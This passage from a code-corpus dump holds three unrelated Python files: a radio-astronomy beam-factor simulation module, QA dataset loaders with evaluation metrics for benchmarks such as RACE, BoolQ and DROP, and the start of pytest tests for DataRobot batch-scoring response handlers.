"meta": {
"beam_file": lambda x: isinstance(x, str),
"simulator": lambda x: isinstance(x, str),
"f_low": lambda x: isinstance(x, float),
"f_high": lambda x: isinstance(x, float),
"normalize_beam": lambda x: isinstance(x, (bool, np.bool_)),
"sky_model": lambda x: isinstance(x, str),
"rotation_from_north": lambda x: isinstance(x, float),
"index_model": lambda x: isinstance(x, str),
"reference_frequency": lambda x: isinstance(x, float),
"max_nside": lambda x: isinstance(x, (int, np.int64)),
},
}
@property
def beam_factor(self):
"""The beam chromaticity factor. Array is ``(n_lsts, n_freq)``."""
return self.load("beam_factor")
@property
def frequency(self):
"""The frequencies at which the beam factor is defined."""
return self.load("frequency")
@property
def lsts(self):
"""The LSTs at which the beam factor is defined."""
return self.load("lst")
def sky_convolution_generator(
lsts: np.ndarray,
ground_loss_file: str,
beam: Beam,
sky_model: sky_models.SkyModel,
index_model: sky_models.IndexModel,
normalize_beam: bool,
beam_smoothing: bool,
smoothing_model: mdl.Model,
location: apc.EarthLocation = const.edges_location,
ref_time: apt.Time = REFERENCE_TIME,
):
"""
Iterate through given LSTs and generate a beam*sky product at each freq and LST.
This is a generator, so it will yield a single item at a time (to save on memory).
Parameters
----------
lsts
The LSTs at which to evaluate the convolution.
ground_loss_file
A path to a file containing ground loss information.
beam
The beam to convolve.
sky_model
The sky model to convolve
index_model
The spectral index model of the sky model.
normalize_beam
Whether to ensure the beam is properly normalised.
beam_interpolation
Whether to smooth over freq axis
Yields
------
i
The LST enumerator
j
The frequency enumerator
mean_conv_temp
The mean temperature after multiplying by the beam (above the horizon)
conv_temp
An array containing the temperature after multiuplying by the beam in each pixel
above the horizon.
sky
An array containing the sky temperature in pixel above the horizon.
beam
An array containing the interpolatedbeam in pixels above the horizon
time
The local time at each LST.
n_pixels
The total number of pixels that are not masked.
Examples
--------
Use this function as follows:
>>> for i, j, mean_t, conv_t, sky, bm, time, npix in sky_convolution_generator():
>>> print(conv_t)
"""
if beam_smoothing:
beam = beam.smoothed(smoothing_model)
sky_map = sky_model.at_freq(
beam.frequency,
index_model=index_model,
)
ground_gain = ground_loss(
ground_loss_file, band=beam.instrument, freq=beam.frequency
)
galactic_coords = sky_model.get_sky_coords()
# Get the local times corresponding to the given LSTs
times = coords.lsts_to_times(lsts, ref_time, location)
for i, time in tqdm(enumerate(times), unit="LST"):
# Transform Galactic coordinates of Sky Model to Local coordinates
altaz = galactic_coords.transform_to(
apc.AltAz(
location=const.edges_location,
obstime=time,
)
)
az = np.asarray(altaz.az.deg)
el = np.asarray(altaz.alt.deg)
# Number of pixels over 4pi that are not 'nan'
n_pix_tot = len(el)
# Selecting coordinates above the horizon
horizon_mask = el >= 0
az_above_horizon = az[horizon_mask]
el_above_horizon = el[horizon_mask]
# Selecting sky data above the horizon
sky_above_horizon = np.ones_like(sky_map) * np.nan
sky_above_horizon[horizon_mask, :] = sky_map[horizon_mask, :]
# Loop over frequency
for j in tqdm(range(len(beam.frequency)), unit="Frequency"):
beam_above_horizon = np.ones(len(sky_map)) * np.nan
beam_above_horizon[horizon_mask] = beam.angular_interpolator(j)(
az_above_horizon, el_above_horizon
)
n_pix_ok = np.sum(~np.isnan(beam_above_horizon))
# The nans are only above the horizon
n_pix_tot_no_nan = n_pix_tot - (len(el_above_horizon) - n_pix_ok)
if normalize_beam:
solid_angle = np.nansum(beam_above_horizon) / n_pix_tot_no_nan
beam_above_horizon *= ground_gain[j] / solid_angle
antenna_temperature_above_horizon = (
beam_above_horizon * sky_above_horizon[:, j]
)
yield (
i,
j,
np.nansum(antenna_temperature_above_horizon) / n_pix_tot_no_nan,
antenna_temperature_above_horizon,
sky_above_horizon,
beam_above_horizon,
time,
n_pix_tot_no_nan,
)
def simulate_spectra(
beam: Beam,
ground_loss_file: [str, Path] = ":",
f_low: [None, float] = 0,
f_high: [None, float] = np.inf,
normalize_beam: bool = True,
sky_model: sky_models.SkyModel = sky_models.Haslam408(),
index_model: sky_models.IndexModel = sky_models.ConstantIndex(),
lsts: np.ndarray = None,
beam_smoothing: bool = True,
smoothing_model: mdl.Model = mdl.Polynomial(n_terms=12),
) -> tuple[np.ndarray, np.ndarray, np.ndarray]:
"""
Simulate global spectra from sky and beam models.
Parameters
----------
band
The band of the antenna (low, mid, high).
beam
A :class:`Beam` object.
ground_loss_file
A file pointing to a ground-loss model. By default, gets the default ground loss
model for the given ``band``.
f_low
Minimum frequency to keep in the simulation (frequencies otherwise defined by
the beam).
f_high
Maximum frequency to keep in the simulation (frequencies otherwise defined by
the beam).
normalize_beam
Whether to normalize the beam to be maximum unity.
sky_model
A sky model to use.
index_model
An :class:`IndexModel` to use to generate different frequencies of the sky
model.
lsts
The LSTs at which to simulate
Returns
-------
antenna_temperature_above_horizon
The antenna temperature for pixels above the horizon, shape (Nlst, Nfreq)
freq
The frequencies at which the simulation is defined.
lst
The LSTs at which the sim is defined.
"""
beam = beam.between_freqs(f_low, f_high)
if lsts is None:
lsts = np.arange(0, 24, 0.5)
antenna_temperature_above_horizon = np.zeros((len(lsts), len(beam.frequency)))
for i, j, temperature, _, _, _, _, _ in sky_convolution_generator(
lsts,
ground_loss_file,
beam,
sky_model,
index_model,
normalize_beam,
beam_smoothing,
smoothing_model,
):
antenna_temperature_above_horizon[i, j] = temperature
return antenna_temperature_above_horizon, beam.frequency, lsts
def antenna_beam_factor(
beam: Beam,
ground_loss_file: [str, Path] = ":",
f_low: float = 0,
f_high: float = np.inf,
normalize_beam: bool = True,
sky_model: sky_models.SkyModel = sky_models.Haslam408(),
index_model: sky_models.IndexModel = sky_models.GaussianIndex(),
lsts: [None, np.ndarray] = None,
save_dir: [None, str, Path] = None,
save_fname: [None, str, Path, bool] = None,
reference_frequency: [None, float] = None,
beam_smoothing: bool = True,
smoothing_model: mdl.Model = mdl.Polynomial(n_terms=12),
):
"""
Calculate the antenna beam factor.
Parameters
----------
beam
A :class:`Beam` object.
ground_loss_file
A file pointing to a ground-loss model. By default, gets the default ground loss
model for the given ``band``.
f_low
Minimum frequency to keep in the simulation (frequencies otherwise defined by
the beam).
f_high
Maximum frequency to keep in the simulation (frequencies otherwise defined by
the beam).
normalize_beam
Whether to normalize the beam to be maximum unity.
sky_model
A sky model to use.
index_model
An :class:`IndexModel` to use to generate different frequencies of the sky
model.
twenty_min_per_lst
How many periods of twenty minutes fit into each LST bin.
save_dir
The directory in which to save the output beam factor.
save_fname
The filename to save the output beam factor.
reference_frequency
The frequency to take as the "reference", i.e. where the chromaticity will
be by construction unity.
Returns
-------
beam_factor : :class`BeamFactor` instance
"""
if not save_dir:
save_dir = Path(config["paths"]["beams"]) / f"{beam.instrument}/beam_factors/"
else:
save_dir = Path(save_dir)
if str(save_fname).startswith(":"):
save_fname = Path(save_dir).absolute() / str(save_fname)[1:]
beam = beam.between_freqs(f_low, f_high)
if lsts is None:
lsts = np.arange(0, 24, 0.5)
# Get index of reference frequency
if reference_frequency is None:
reference_frequency = (f_high + f_low) / 2
indx_ref_freq = np.argwhere(beam.frequency >= reference_frequency)[0][0]
reference_frequency = beam.frequency[indx_ref_freq]
antenna_temperature_above_horizon = np.zeros((len(lsts), len(beam.frequency)))
convolution_ref = np.zeros((len(lsts), len(beam.frequency)))
loss_fraction = np.zeros((len(lsts), len(beam.frequency)))
for i, j, temperature, _, sky, bm, _, npix_no_nan in sky_convolution_generator(
lsts,
beam=beam,
sky_model=sky_model,
index_model=index_model,
normalize_beam=normalize_beam,
beam_smoothing=beam_smoothing,
smoothing_model=smoothing_model,
ground_loss_file=ground_loss_file,
):
antenna_temperature_above_horizon[i, j] = temperature
# Convolution between (beam at all frequencies) and (sky at reference frequency)
convolution_ref[i, j] = np.nansum(bm * sky[:, indx_ref_freq])
# Loss fraction
loss_fraction[i, j] = 1 - np.nansum(bm) / npix_no_nan
# Beam factor
beam_factor = (convolution_ref.T / convolution_ref[:, indx_ref_freq]).T
out = {
"frequency": beam.frequency.astype(float),
"lst": np.array(lsts).astype(float),
"antenna_temp_above_horizon": antenna_temperature_above_horizon,
"loss_fraction": loss_fraction,
"beam_factor": beam_factor,
"meta": {
"beam_file": str(beam.raw_file),
"simulator": beam.simulator,
"f_low": float(f_low),
"f_high": float(f_high),
"normalize_beam": bool(normalize_beam),
"sky_model": str(sky_model),
"index_model": str(index_model),
"reference_frequency": float(reference_frequency),
"rotation_from_north": float(90),
"max_nside": int(sky_model.max_res or 0),
},
}
if save_fname is None:
hsh = hashlib.md5(repr(out["meta"]).encode()).hexdigest()
save_fname = save_dir / (
f"{beam.simulator}_{sky_model.__class__.__name__}_"
f"ref{reference_frequency:.2f}_{hsh}.h5"
)
logger.info(f"Writing out beam file to {save_fname}")
bf = BeamFactor.from_data(out, filename=save_fname)
bf.write(clobber=True)
return bf
class InterpolatedBeamFactor(HDF5Object):
_structure = {
"beam_factor": None,
"frequency": None,
"lst": None,
}
@classmethod
def from_beam_factor(
cls,
beam_factor_file,
band: str | None = None,
lst_new: np.ndarray | None = None,
f_new: np.ndarray | None = None,
):
"""
Interpolate beam factor to a new set of LSTs and frequencies.
The LST interpolation is done using `griddata`, whilst the frequency
interpolation is done using a polynomial fit.
Parameters
----------
beam_factor_file : path
Path to a file containing beam factors produced by
:func:`antenna_beam_factor`.
If just a filename (no path), the `beams/band/beam_factors/` directory will
be searched (dependent on the configured "beams" directory).
band : str, optional
If `beam_factor_file` is relative, the band is required to find the file.
lst_new : array-like, optional
The LSTs to interpolate to. By default, keep same LSTs as input.
f_new : array-like, optional
The frequencies to interpolate to. By default, keep same frequencies as
input.
"""
beam_factor_file = Path(beam_factor_file).expanduser()
if str(beam_factor_file).startswith(":"):
beam_factor_file = (
Path(config["paths"]["beams"])
/ band
/ "beam_factors"
/ str(beam_factor_file)[1:]
)
if not beam_factor_file.exists():
raise ValueError(f"The beam factor file {beam_factor_file} does not exist!")
with h5py.File(beam_factor_file, "r") as fl:
beam_factor = fl["beam_factor"][...]
freq = fl["frequency"][...]
lst = fl["lst"][...]
# Wrap beam factor and LST for 24-hr interpolation
beam_factor = np.vstack((beam_factor[-1], beam_factor, beam_factor[0]))
lst0 = np.append(lst[-1] - 24, lst)
lst = np.append(lst0, lst[0] + 24)
if lst_new is not None:
beam_factor_lst = np.zeros((len(lst_new), len(freq)))
for i, bf in enumerate(beam_factor.T):
beam_factor_lst[:, i] = spi.interp1d(lst, bf, kind="cubic")(lst_new)
lst = lst_new
else:
beam_factor_lst = beam_factor
if f_new is not None:
# Interpolating beam factor to high frequency resolution
beam_factor_freq = np.zeros((len(beam_factor_lst), len(f_new)))
for i, bf in enumerate(beam_factor_lst):
beam_factor_freq[i] = spi.interp1d(freq, bf, kind="cubic")(f_new)
freq = f_new
else:
beam_factor_freq = beam_factor_lst
return cls.from_data(
{"beam_factor": beam_factor_freq, "frequency": freq, "lst": lst}
)
def evaluate(self, lst):
"""Fast nearest-neighbour evaluation of the beam factor for a given LST."""
beam_factor = np.zeros((len(lst), len(self["frequency"])))
for i, lst_ in enumerate(lst):
index = np.argmin(np.abs(self["lst"] - lst_))
beam_factor[i] = self["beam_factor"][index]
return beam_factor
| StarcoderdataPython |
3275075 | <filename>MetaQA/QA_Dataset/QA_Dataset.py
from __future__ import annotations
import json
import random
from datasets import load_dataset, load_metric
import json
import re
import string
from collections import Counter
from rouge_score import rouge_scorer
import pandas as pd
import os
class QA_Dataset():
    """Base container for QA datasets.

    Stores questions, gold answers, answer options and the gold option index
    keyed by question id (qid), and provides the shared text-normalisation
    and token-F1 utilities used by the evaluators.
    """

    def __init__(self, dataset_name) -> None:
        self.list_qids = []  # ordered question ids
        self.dataset_name = dataset_name
        self._dict_qid2question = dict()  # qid -> question text
        self._dict_qid2list_answer_labels = dict()  # qid -> gold answer strings
        self._dict_qid2list_options = dict()  # qid -> answer options (MCQ only)
        self._dict_qid2ans_idx = dict()  # qid -> gold option index (MCQ only)

    def get_question(self, qid) -> str:
        """Return the question text for qid, raising ValueError if unknown."""
        if qid in self._dict_qid2question:
            return self._dict_qid2question[qid]
        else:
            raise ValueError("qid not found in dataset")

    def get_list_answer_label(self, qid) -> list[str]:
        """Return the gold answer strings for qid, raising ValueError if unknown.

        The annotation was ``list(str)`` — a call expression, not a type —
        which only avoided a runtime crash because of the module's
        ``from __future__ import annotations``; fixed to ``list[str]``.
        """
        if qid in self._dict_qid2list_answer_labels:
            return self._dict_qid2list_answer_labels[qid]
        else:
            raise ValueError("qid not found in dataset")

    def get_list_options(self, qid) -> list[str]:
        """Return the multiple-choice options for qid, raising ValueError if unknown."""
        if qid in self._dict_qid2list_options:
            return self._dict_qid2list_options[qid]
        else:
            raise ValueError("qid not found in dataset")

    def evaluate(self, dict_qid2prediction) -> dict:
        '''
        Input: dict_qid2prediction: dict of qid to prediction (str)
        Output: {'metric': value}
        '''
        raise NotImplementedError("Please Implement this method")

    def __getitem__(self, item):
        """Return example ``item`` as ``{'qid', 'question', 'answer_label'}``."""
        qid = self.list_qids[item]
        return {'qid': qid, 'question': self.get_question(qid),
                'answer_label': self.get_list_answer_label(qid)}

    def __len__(self):
        """Number of questions in the dataset."""
        return len(self.list_qids)

    def __repr__(self) -> str:
        # prints name and length of dataset
        return f"{self.dataset_name} with {len(self)} questions"

    def normalize_answer(self, s):
        """Lower text and remove punctuation, articles and extra whitespace."""
        def remove_articles(text):
            return re.sub(r"\b(a|an|the)\b", " ", text)

        def white_space_fix(text):
            return " ".join(text.split())

        def remove_punc(text):
            exclude = set(string.punctuation)
            return "".join(ch for ch in text if ch not in exclude)

        def lower(text):
            return text.lower()

        return white_space_fix(remove_articles(remove_punc(lower(s))))

    def f1_score(self, prediction, ground_truth):
        """Token-level F1 between the normalised prediction and ground truth.

        Returns 0 on zero overlap, which also guards the divisions below
        against empty token lists.
        """
        prediction_tokens = self.normalize_answer(prediction).split()
        ground_truth_tokens = self.normalize_answer(ground_truth).split()
        common = Counter(prediction_tokens) & Counter(ground_truth_tokens)
        num_same = sum(common.values())
        if num_same == 0:
            return 0
        precision = 1.0 * num_same / len(prediction_tokens)
        recall = 1.0 * num_same / len(ground_truth_tokens)
        f1 = (2 * precision * recall) / (precision + recall)
        return f1
class Extractive_QA_Dataset(QA_Dataset):
    """Extractive QA dataset loaded from a SQuAD-style JSON file."""

    def __init__(self, dataset_path, dataset_name, subsample_size=None) -> None:
        """Load (and optionally subsample) the examples from dataset_path."""
        super().__init__(dataset_name)
        with open(dataset_path, 'r') as f:
            data = json.load(f)
        if subsample_size is not None:
            data['data'] = random.sample(data['data'], subsample_size)
        for example in data['data']:
            qid = example['id']
            self.list_qids.append(qid)
            self._dict_qid2question[qid] = example['question']
            self._dict_qid2list_answer_labels[qid] = example['answers']['text']

    def evaluate(self, dict_qid2prediction) -> dict:
        '''
        Input: dict_qid2prediction: dict of qid (str) to prediction (str)
        Output: {'exact_match': value, 'f1': value}
        '''
        # SQuAD metric wants references with dummy answer_start offsets.
        metric = load_metric('squad')
        references = []
        for qid in self.list_qids:
            answers = self.get_list_answer_label(qid)
            references.append({
                'id': qid,
                'answers': {'text': list(answers), 'answer_start': [0] * len(answers)},
            })
        predictions = [{'id': qid, 'prediction_text': pred}
                       for qid, pred in dict_qid2prediction.items()]
        return metric.compute(predictions=predictions, references=references)
class MultipleChoice_QA_Dataset(QA_Dataset):
    """Base class for multiple-choice QA datasets scored by accuracy."""

    def __init__(self, dataset_name) -> None:
        super().__init__(dataset_name)

    def evaluate(self, dict_qid2prediction) -> dict:
        '''
        Input: dict_qid2prediction: dict of qid to prediction (str)
        Metric: accuracy
        Output: {'accuracy': value}
        '''
        accuracy_metric = load_metric("accuracy")
        predictions, references = [], []
        for qid, prediction in dict_qid2prediction.items():
            # Map the free-text prediction onto the closest answer option
            # by token-level F1 overlap, then score as an index match.
            options = self.get_list_options(qid)
            scores = []
            for option in options:
                scores.append(super().f1_score(prediction, option))
            predictions.append(scores.index(max(scores)))
            references.append(self._dict_qid2ans_idx[qid])
        results = accuracy_metric.compute(references=references, predictions=predictions)
        results['accuracy'] = results['accuracy'] * 100
        return results
class RACE_Dataset(MultipleChoice_QA_Dataset):
    """RACE reading-comprehension dataset (four-option multiple choice)."""

    def __init__(self, config, split) -> None:
        super().__init__('RACE')
        data = load_dataset('race', config)[split]
        letter_to_idx = {'A': 0, 'B': 1, 'C': 2, 'D': 3}
        for i, example in enumerate(data):
            # Drop questions that are empty once '?' and whitespace are stripped.
            if example['question'].replace("?", "").lower().strip() == "":
                continue
            qid = example['example_id'] + "-" + str(i)
            self.list_qids.append(qid)
            self._dict_qid2question[qid] = example['question']
            answer_idx = letter_to_idx[example['answer']]
            self._dict_qid2list_answer_labels[qid] = [example['options'][answer_idx]]
            self._dict_qid2list_options[qid] = example["options"]
            self._dict_qid2ans_idx[qid] = answer_idx
class CommonSenseQA_Dataset(MultipleChoice_QA_Dataset):
    """CommonsenseQA dataset (five-option multiple choice)."""

    def __init__(self, split, list_qids=None) -> None:
        super().__init__('CommonSenseQA')
        data = load_dataset('commonsense_qa')[split]
        letter_to_idx = {'A': 0, 'B': 1, 'C': 2, 'D': 3, 'E': 4}
        for i, example in enumerate(data):
            qid = "csqa-" + str(i)
            # Optional qid filter: keep everything when list_qids is None.
            if list_qids is not None and qid not in list_qids:
                continue
            self.list_qids.append(qid)
            self._dict_qid2question[qid] = example['question']
            answer_idx = letter_to_idx[example['answerKey']]
            self._dict_qid2list_answer_labels[qid] = [example['choices']['text'][answer_idx]]
            self._dict_qid2list_options[qid] = example['choices']['text']
            self._dict_qid2ans_idx[qid] = answer_idx
class HellaSWAG_Dataset(MultipleChoice_QA_Dataset):
    """HellaSWAG sentence-completion dataset (multiple choice over endings)."""

    def __init__(self, split, list_qids=None) -> None:
        super().__init__('HellaSWAG')
        data = load_dataset('hellaswag')[split]
        for i, example in enumerate(data):
            qid = "HellaSWAG-" + str(i)
            # Optional qid filter: keep everything when list_qids is None.
            if list_qids is not None and qid not in list_qids:
                continue
            self.list_qids.append(qid)
            self._dict_qid2question[qid] = example['ctx']
            answer_idx = int(example['label'])
            self._dict_qid2list_answer_labels[qid] = [example['endings'][answer_idx]]
            self._dict_qid2list_options[qid] = example['endings']
            self._dict_qid2ans_idx[qid] = answer_idx
class SIQA_Dataset(MultipleChoice_QA_Dataset):
    """SocialIQA dataset: three answer choices, 1-based gold labels."""

    def __init__(self, split, list_qids=None) -> None:
        super().__init__('SIQA')
        data = load_dataset('social_i_qa')[split]
        for i, example in enumerate(data):
            qid = "SIQA-" + str(i)
            # Optional qid filter: keep everything when list_qids is None.
            if list_qids is not None and qid not in list_qids:
                continue
            self.list_qids.append(qid)
            self._dict_qid2question[qid] = example['question']
            answer_idx = int(example['label']) - 1  # originally starts at 1
            choices = [example['answerA'], example['answerB'], example['answerC']]
            self._dict_qid2list_answer_labels[qid] = [choices[answer_idx]]
            self._dict_qid2list_options[qid] = choices
            self._dict_qid2ans_idx[qid] = answer_idx
class BoolQ_Dataset(MultipleChoice_QA_Dataset):
    """BoolQ yes/no dataset framed as two-option multiple choice."""

    def __init__(self, split, list_qids=None) -> None:
        super().__init__('BoolQ')
        data = load_dataset('boolq')[split]
        for i, example in enumerate(data):
            qid = "BoolQ-" + str(i)
            # Optional qid filter: keep everything when list_qids is None.
            if list_qids is not None and qid not in list_qids:
                continue
            self.list_qids.append(qid)
            self._dict_qid2question[qid] = example['question']
            answer_idx = 1 if example['answer'] else 0
            self._dict_qid2list_answer_labels[qid] = [['False', 'True'][answer_idx]]
            self._dict_qid2list_options[qid] = ['False', 'True']
            self._dict_qid2ans_idx[qid] = answer_idx
class DROP_Dataset(QA_Dataset):
    """DROP discrete-reasoning dataset with span answers."""

    def __init__(self, split, list_qids=None) -> None:
        super().__init__('DROP')
        data = load_dataset("drop")[split]
        for example in data:
            qid = example['query_id']
            # Optional qid filter: keep everything when list_qids is None.
            if list_qids is not None and qid not in list_qids:
                continue
            self.list_qids.append(qid)
            self._dict_qid2question[qid] = example['question']
            self._dict_qid2list_answer_labels[qid] = example['answers_spans']['spans']

    def evaluate(self, dict_qid2prediction) -> dict:
        '''
        Input: dict_qid2prediction: dict of qid (str) to prediction (str)
        Output: {'exact_match': value, 'f1': value}
        '''
        metric = load_metric('squad')
        references = []
        seen = set()
        for qid in self.list_qids:
            # DROP contains a duplicated qid; emit each reference only once
            # because the predictions are keyed uniquely by qid.
            if qid in seen:
                continue
            seen.add(qid)
            answers = self.get_list_answer_label(qid)
            references.append({
                'id': qid,
                'answers': {'text': list(answers), 'answer_start': [0] * len(answers)},
            })
        predictions = [{'id': qid, 'prediction_text': pred}
                       for qid, pred in dict_qid2prediction.items()]
        return metric.compute(predictions=predictions, references=references)
class NarrativeQA_Dataset(QA_Dataset):
    """NarrativeQA abstractive dataset read from a UnifiedQA-format TSV."""

    def __init__(self, datapath) -> None:
        '''
        The input format is the same as in UnifiedQA
        '''
        super().__init__('NarrativeQA')
        path = os.path.join(datapath, 'abstractive', 'narrativeqa.tsv')
        self.df = pd.read_csv(path, sep='\t', names=['x', 'y'])
        # Group duplicated inputs: each unique question string maps to the
        # line numbers of all of its reference answers.
        self.dict_instance2list_linenum = {}
        for line_num, instance in enumerate(self.df['x'].tolist()):
            self.dict_instance2list_linenum.setdefault(instance, []).append(line_num)
        self.golds = [label.strip() for label in self.df['y'].tolist()]
        for idx, (instance, line_nums) in enumerate(self.dict_instance2list_linenum.items()):
            qid = 'NarrativeQA-' + str(idx)
            self.list_qids.append(qid)
            self._dict_qid2question[qid] = instance.split('\\n')[0].strip()
            self._dict_qid2list_answer_labels[qid] = [self.golds[n] for n in line_nums]

    def evaluate(self, dict_qid2pred):
        '''
        Adapted from https://github.com/allenai/unifiedqa/blob/master/evaluation/evaluate_narrativeqa.py
        '''
        scorer = rouge_scorer.RougeScorer(['rougeL'], use_stemmer=True)
        scores = [
            self.__metric_max_over_ground_truths(
                dict_qid2pred[qid], self.get_list_answer_label(qid), scorer)
            for qid in self.list_qids
        ]
        return {'RougeL': 100.0 * sum(scores) / len(scores)}

    def __metric_max_over_ground_truths(self, prediction, ground_truths, metric_fn):
        '''
        From on https://github.com/allenai/unifiedqa/blob/master/evaluation/evaluate_narrativeqa.py
        '''
        best = max(metric_fn.score(prediction, ground_truth)['rougeL'].fmeasure
                   for ground_truth in ground_truths)
        return round(best, 2)
class HybridQA_Dataset(QA_Dataset):
    """HybridQA table+text dataset with single extractive answers."""

    def __init__(self, split, list_qids=None) -> None:
        super().__init__('HybridQA')
        data = load_dataset("hybrid_qa")[split]
        for example in data:
            qid = example['question_id']
            # Optional qid filter: keep everything when list_qids is None.
            if list_qids is not None and qid not in list_qids:
                continue
            self.list_qids.append(qid)
            self._dict_qid2question[qid] = example['question']
            self._dict_qid2list_answer_labels[qid] = [example['answer_text']]

    def evaluate(self, dict_qid2prediction) -> dict:
        '''
        Input: dict_qid2prediction: dict of qid (str) to prediction (str)
        Output: {'exact_match': value, 'f1': value}
        '''
        metric = load_metric('squad')
        references = []
        for qid in self.list_qids:
            answers = self.get_list_answer_label(qid)
            references.append({
                'id': qid,
                'answers': {'text': list(answers), 'answer_start': [0] * len(answers)},
            })
        predictions = [{'id': qid, 'prediction_text': pred}
                       for qid, pred in dict_qid2prediction.items()]
        return metric.compute(predictions=predictions, references=references)
class List_QA_Datasets(QA_Dataset):
    """A QA dataset built by concatenating several existing datasets.

    Remembers which source dataset produced each qid so mixed batches can
    still be evaluated per-dataset.
    """

    def __init__(self, list_datasets, dataset_name, shuffle) -> None:
        """
        Args:
            list_datasets: QA_Dataset instances to concatenate.
            dataset_name: name for the combined dataset.
            shuffle: if True, shuffle the concatenated examples.
        """
        super().__init__(dataset_name)
        self.__dict_qid2dataset_name = dict()
        self.dict_dataset_name2list_qids = dict()
        list_features = []
        # concatenate all datasets, recording each qid's origin
        for dataset in list_datasets:
            # QA_Dataset is iterable via __getitem__, so extend directly
            # (the original wrapped it in a redundant list comprehension).
            list_features.extend(dataset)
            self.dict_dataset_name2list_qids[dataset.dataset_name] = dataset.list_qids
            for qid in dataset.list_qids:
                self.__dict_qid2dataset_name[qid] = dataset.dataset_name
        # shuffle
        if shuffle:
            random.shuffle(list_features)
        # create the QA_Dataset
        for feature in list_features:
            qid = feature['qid']
            self.list_qids.append(qid)
            self._dict_qid2question[qid] = feature['question']
            self._dict_qid2list_answer_labels[qid] = feature['answer_label']

    def get_dataset_name(self, qid):
        """Return the name of the source dataset that produced ``qid``."""
        return self.__dict_qid2dataset_name[qid]

    def get_list_datasets(self):
        """Return the names of the concatenated source datasets."""
        return list(self.dict_dataset_name2list_qids.keys())
| StarcoderdataPython |
1723668 | <reponame>satvidh/batch-scoring
import pytest
from datarobot_batch_scoring.api_response_handlers import pred_api_v10, api_v1
from datarobot_batch_scoring.consts import Batch
from datarobot_batch_scoring.exceptions import UnexpectedKeptColumnCount, \
NoPredictionThresholdInResult
@pytest.fixture()
def parsed_pred_api_v10_predictions():
    """Two binary-classification rows as returned by the Prediction API v1.0."""
    return [
        {
            "predictionValues": [{"value": 1, "label": "readmitted"}],
            "prediction": 1,
            "predictionThreshold": 0.5,
            "rowId": 0
        },
        {
            "predictionValues": [{"value": 1, "label": "readmitted"}],
            "prediction": 1,
            "predictionThreshold": 0.5,
            "rowId": 1
        }]
@pytest.fixture()
def parsed_pred_api_v10_predictions_regression():
    """Two regression rows — note there is no predictionThreshold key."""
    return [
        {
            "predictionValues": [{"value": 42.42, "label": "currency"}],
            "prediction": 42.42,
            "rowId": 0
        },
        {
            "predictionValues": [{"value": 84.84, "label": "currency"}],
            "prediction": 84.84,
            "rowId": 1
        }]
@pytest.fixture()
def parsed_api_v1_predictions():
    """Legacy api/v1 payload: class probabilities for two binary rows."""
    return {
        'model_id': '123',
        'status': '',
        'code': 200,
        'execution_time': 100,
        'task': 'Binary',
        'version': 'v1',
        'predictions': [{'class_probabilities': {'0.0': 0.4,
                                                 '1.0': 0.6},
                         'prediction': 1.0,
                         'row_id': 0},
                        {'class_probabilities': {'0.0': 0.6,
                                                 '1.0': 0.4},
                         'prediction': 0.0,
                         'row_id': 1}]
    }
@pytest.fixture()
def batch():
    """A two-row Batch whose rows are already split into column-value lists."""
    return Batch(id=0,
                 fieldnames=['race', 'gender', 'age', 'weight', 'readmitted'],
                 rows=2,
                 data=[
                     ['Caucasian', 'Male', '[50-60)', '?', 'FALSE'],
                     ['Caucasian', 'Male', '[50-60)', '?', 'TRUE']
                 ],
                 rty_cnt=3)
@pytest.fixture()
def fast_batch_quoted_newline():
    """Fast-mode Batch where a quoted newline split one logical row in two.

    rows=2 but three raw strings: the second logical row's fields span the
    last two data entries, which fast mode cannot re-join.
    """
    return Batch(id=0,
                 fieldnames=['race', 'gender', 'age', 'weight', 'readmitted'],
                 rows=2,
                 data=[
                     'Caucasian,Male,[50-60),?,FALSE',
                     'Caucasian,Male,[50-60),?',
                     'TRUE'
                 ],
                 rty_cnt=3)
@pytest.fixture()
def fast_batch_with_quoted_comma():
    """Fast-mode Batch whose second row has a quoted comma ("[50,60)")
    that a naive delimiter split would break on."""
    return Batch(id=0,
                 fieldnames=['race', 'gender', 'age', 'weight', 'readmitted'],
                 rows=2,
                 data=[
                     'Caucasian,Male,[50-60),?,FALSE',
                     'Caucasian,Male,"[50,60)",?,TRUE'
                 ],
                 rty_cnt=3)
class TestPredApiV10Handlers(object):
    """Tests for the Prediction API v1.0 response handlers."""

    def test_unpack_data(self):
        """unpack_data parses the JSON body and returns (rows, exec_time, elapsed)."""
        result = pred_api_v10.unpack_data({
            'elapsed': 0.123,
            'text': '''
            {
                "data": [{
                        "predictionValues": [{"value":5.0001011968,"label":"z"}],
                        "prediction":5.0001011968,
                        "rowId":0
                    },
                    {
                        "predictionValues": [{"value":5.0001011968,"label":"z"}],
                        "prediction":5.0001011968,
                        "rowId":0
                    }]
            }
            ''',
            'headers': {
                'X-DataRobot-Execution-Time': 10
            }
        })
        assert type(result) is tuple
        data, exec_time, elapsed = result
        assert len(data) == 2
        assert elapsed == 0.123
        assert exec_time == 10

    @pytest.mark.parametrize('opts, expected_fields, expected_values', (
        ({'pred_name': None,
          'pred_threshold_name': None,
          'pred_decision_name': None,
          'keep_cols': None,
          'skip_row_id': False,
          'fast_mode': False,
          'delimiter': ','},
         ['row_id', 'readmitted'],
         [[0, 1], [1, 1]]),
        ({'pred_name': None,
          'pred_threshold_name': None,
          'pred_decision_name': None,
          'keep_cols': ['gender'],
          'skip_row_id': False,
          'fast_mode': False,
          'delimiter': ','},
         ['row_id', 'gender', 'readmitted'],
         [[0, 'Male', 1], [1, 'Male', 1]]),
        ({'pred_name': None,
          'pred_threshold_name': None,
          'pred_decision_name': None,
          'keep_cols': ['gender'],
          'skip_row_id': True,
          'fast_mode': False,
          'delimiter': ','},
         ['gender', 'readmitted'],
         [['Male', 1], ['Male', 1]]),
        # NOTE(review): this case omits 'pred_decision_name' — presumably
        # format_data defaults it; confirm against the handler signature.
        ({'pred_name': None,
          'pred_threshold_name': 'threshold',
          'keep_cols': None,
          'skip_row_id': False,
          'fast_mode': False,
          'delimiter': ','},
         ['row_id', 'readmitted', 'threshold'],
         [[0, 1, 0.5], [1, 1, 0.5]]),
        ({'pred_name': None,
          'pred_decision_name': 'label',
          'pred_threshold_name': None,
          'keep_cols': None,
          'skip_row_id': False,
          'fast_mode': False,
          'delimiter': ','},
         ['row_id', 'readmitted', 'label'],
         [[0, 1, 1], [1, 1, 1]]),
        ({'pred_name': None,
          'pred_decision_name': 'label',
          'pred_threshold_name': 'threshold',
          'keep_cols': None,
          'skip_row_id': False,
          'fast_mode': False,
          'delimiter': ','},
         ['row_id', 'readmitted', 'threshold', 'label'],
         [[0, 1, 0.5, 1], [1, 1, 0.5, 1]]),
    ))
